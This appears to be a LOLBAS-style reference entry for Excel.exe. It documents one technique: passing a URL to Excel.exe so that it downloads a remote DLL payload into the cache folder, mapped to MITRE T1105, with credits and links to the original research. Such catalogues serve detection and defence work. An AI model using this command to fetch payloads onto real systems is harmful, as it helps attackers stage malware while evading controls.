.. / Excel.exe
Star

Microsoft Office binary


Paths:


Resources:
https://twitter.com/reegun21/status/1150032506504151040
https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191

Acknowledgement:
Reegun J (OCBC Bank) - @reegun21


Detection:



Download

Downloads payload from remote server
Excel.exe http://192.168.1.10/TeamsAddinLoader.dll
Usecase:It will download a remote payload and place it in the cache folder
Privileges required:User
OS:Windows
Mitre:T1105